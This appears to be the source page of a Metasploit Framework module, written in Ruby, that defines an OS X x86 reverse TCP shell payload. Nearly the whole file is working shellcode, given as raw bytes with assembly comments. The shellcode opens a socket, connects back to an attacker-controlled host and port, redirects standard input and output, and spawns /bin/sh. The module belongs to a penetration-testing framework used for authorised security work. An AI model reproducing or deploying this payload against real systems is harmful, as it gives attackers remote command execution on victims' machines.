Path: blob/master/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 6578include Msf::Payload::Single9include Msf::Payload::Osx10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'OS X Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => 'Ramon de C Valle',19'License' => MSF_LICENSE,20'Platform' => 'osx',21'Arch' => ARCH_X86,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' => {25'Offsets' =>26{27'LHOST' => [ 1, 'ADDR' ],28'LPORT' => [ 8, 'n' ]29},30'Payload' =>31"\x68\x7f\x00\x00\x01" + # pushl $0x0100007f #32"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #33"\x89\xe7" + # movl %esp,%edi #34"\x31\xc0" + # xorl %eax,%eax #35"\x50" + # pushl %eax #36"\x6a\x01" + # pushl $0x01 #37"\x6a\x02" + # pushl $0x02 #38"\x6a\x10" + # pushl $0x10 #39"\xb0\x61" + # movb $0x61,%al #40"\xcd\x80" + # int $0x80 #41"\x57" + # pushl %edi #42"\x50" + # pushl %eax #43"\x50" + # pushl %eax #44"\x6a\x62" + # pushl $0x62 #45"\x58" + # popl %eax #46"\xcd\x80" + # int $0x80 #47"\x50" + # pushl %eax #48"\x6a\x5a" + # pushl $0x5a #49"\x58" + # popl %eax #50"\xcd\x80" + # int $0x80 #51"\xff\x4f\xe8" + # decl -0x18(%edi) #52"\x79\xf6" + # jns <cntsockcode+34> #53"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #54"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #55"\x89\xe3" + # movl %esp,%ebx #56"\x50" + # pushl %eax #57"\x54" + # pushl %esp #58"\x54" + # pushl %esp #59"\x53" + # pushl %ebx #60"\x50" + # pushl %eax #61"\xb0\x3b" + # movb $0x3b,%al #62"\xcd\x80" # int $0x80 #63}64)65)66end67end686970